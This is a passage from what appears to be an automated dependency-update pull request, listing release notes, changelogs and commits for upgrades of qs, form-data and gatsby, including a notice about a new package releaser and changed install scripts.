href=\"https://github.com/ljharb/qs/commit/fbc5206c25b4d1851cea683f02c10756c521d15a\"\u003e\u003ccode\u003efbc5206\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/1b9a8b4e78c6aff4c22fa559107227f02fd0216a\"\u003e\u003ccode\u003e1b9a8b4\u003c/code\u003e\u003c/a\u003e [actions] fix rebase workflow permissions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/2a35775614e0fb46ac8a3060201a32a7c23a7fda\"\u003e\u003ccode\u003e2a35775\u003c/code\u003e\u003c/a\u003e [meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.11.1...v6.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `form-data` from 4.0.0 to 4.0.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/releases\"\u003eform-data's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/blob/master/CHANGELOG.md\"\u003eform-data's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMerge tags v2.5.3 and v3.0.3 \u003ca href=\"https://github.com/form-data/form-data/commit/92613b9208556eb4ebc482fdf599fae111626fb6\"\u003e\u003ccode\u003e92613b9\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] migrate from travis to GHA \u003ca href=\"https://github.com/form-data/form-data/commit/806eda77740e6e3c67c7815afb216f2e1f187ba5\"\u003e\u003ccode\u003e806eda7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] migrate from travis to GHA \u003ca href=\"https://github.com/form-data/form-data/commit/8fdb3bc6b5d001f8909a9fca391d1d1d97ef1d79\"\u003e\u003ccode\u003e8fdb3bc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/41996f5ac73a867046d48512cab62e64fc846dad\"\u003e\u003ccode\u003e41996f5\u003c/code\u003e\u003c/a\u003e v4.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e [meta] actually ensure the readme backup isn’t published\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e [meta] fix readme capitalization\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e [meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e [Tests] fix linting errors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e [Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e [Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/d8d67dc8ac79285154edf7d3f57dbab593b9a146\"\u003e\u003ccode\u003ed8d67dc\u003c/code\u003e\u003c/a\u003e v4.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e [meta] remove local commit hooks\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.0...v4.0.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~ljharb\"\u003eljharb\u003c/a\u003e, a new releaser for form-data since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepublish\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `gatsby` from 4.23.1 to 4.25.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/gatsbyjs/gatsby/releases\"\u003egatsby's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003egatsby-source-wordpress@7.13.5 and 6 more...\u003c/h2\u003e\n\u003cp\u003e2024-08-26\u003c/p\u003e\n\u003ch2\u003eUpdated packages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003egatsby-source-wordpress@7.13.5\u003c/li\u003e\n\u003cli\u003egatsby-remark-responsive-iframe@6.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-prismjs@7.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-images@7.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-images@6.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-graphviz@5.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-copy-linked-files@6.13.2\u003c/li\u003e\n\u003cli\u003egatsby-plugin-offline@6.13.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: pin cheerio (\u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/issues/39066\"\u003e#39066\u003c/a\u003e) by \u003ca href=\"https://github.com/gatsbybot\"\u003e\u003ccode\u003e@​gatsbybot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/pull/39069\"\u003egatsbyjs/gatsby#39069\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eSee full release notes: \u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/pull/39070\"\u003egatsbyjs/gatsby#39070\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.24\u003c/h2\u003e\n\u003cp\u003eWelcome to \u003ccode\u003egatsby@4.24.0\u003c/code\u003e release (September 2022 #\u003c!-- raw HTML omitted --\u003e\u003c!-- raw HTML omitted --\u003e2)\u003c/p\u003e\n\u003cp\u003eKey highlights of this release:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.gatsbyjs.com/docs/reference/release-notes/v4.24/#gatsby-5-alpha\"\u003eGatsby 5 Alpha\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.gatsbyjs.com/docs/reference/release-notes/v4.24/#updating-file-system-routes-on-data-changes\"\u003eUpdating File System Routes on data changes\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBleeding Edge\u003c/strong\u003e: Want to try new features as soon as possible? Install \u003ccode\u003egatsby@next\u003c/code\u003e and let us know if you have any \u003ca href=\"https://github.com/gatsbyjs/gatsby/issues\"\u003eissues\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://www.gatsbyjs.com/docs/reference/release-notes/v4.23\"\u003ePrevious release notes\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/compare/gatsby@4.24.0-next.0...gatsby@4.24.0\"\u003eFull changelog\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/abb258b1608d39bc5fd524938411f41326799e55\"\u003e\u003ccode\u003eabb258b\u003c/code\u003e\u003c/a\u003e chore(release): Publish\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/1b0b559b0c06735c5670998271b378d7c0629555\"\u003e\u003ccode\u003e1b0b559\u003c/code\u003e\u003c/a\u003e chore: pin \u003ccode\u003e@​vercel/webpack-asset-relocator-loader\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/issues/38981\"\u003e#38981\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/issues/38983\"\u003e#38983\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/a115f9271ce046f2c9857b6c116c1ecdb6b3e876\"\u003e\u003ccode\u003ea115f92\u003c/code\u003e\u003c/a\u003e chore(release): Publish\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/5ea513c7041e65039b3d3dedb0b1b664cd7b9565\"\u003e\u003ccode\u003e5ea513c\u003c/code\u003e\u003c/a\u003e fix(gatsby): Restore asset, path prefix for file-loader handled files (\u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/issues/38764\"\u003e#38764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/8a80e16b7fb4c0827b025db4c2472039a2de8eaa\"\u003e\u003ccode\u003e8a80e16\u003c/code\u003e\u003c/a\u003e chore(release): Publish\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/7e1cfdb457a2f7316542897e8a2bca2e39451dfd\"\u003e\u003ccode\u003e7e1cfdb\u003c/code\u003e\u003c/a\u003e fix(gatsby-source-wordpress): allow using engines when using wordpress auth (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/db5eb186008c62acb78cf66ae50fd7e1f0d67626\"\u003e\u003ccode\u003edb5eb18\u003c/code\u003e\u003c/a\u003e chore(release): Publish\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/fc22f4ba3ad7ca5fb3592f38f4f0ca8ae60b4bf7\"\u003e\u003ccode\u003efc22f4b\u003c/code\u003e\u003c/a\u003e fix(gatsby): don't serve codeframes for files outside of compilation (\u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/issues/38059\"\u003e#38059\u003c/a\u003e)...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/8889bfe5271985d19c956dff7f567be86ef2f3df\"\u003e\u003ccode\u003e8889bfe\u003c/code\u003e\u003c/a\u003e chore(release): Publish\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/d3d5fd07496411453ab5d8caf869f5a66a18b4f6\"\u003e\u003ccode\u003ed3d5fd0\u003c/code\u003e\u003c/a\u003e fix(gatsby-source-wordpress): prevent inconsistent schema customization (\u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/issues/377\"\u003e#377\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/gatsbyjs/gatsby/compare/gatsby@4.23.1...gatsby@4.25.9\"\u003ecompare 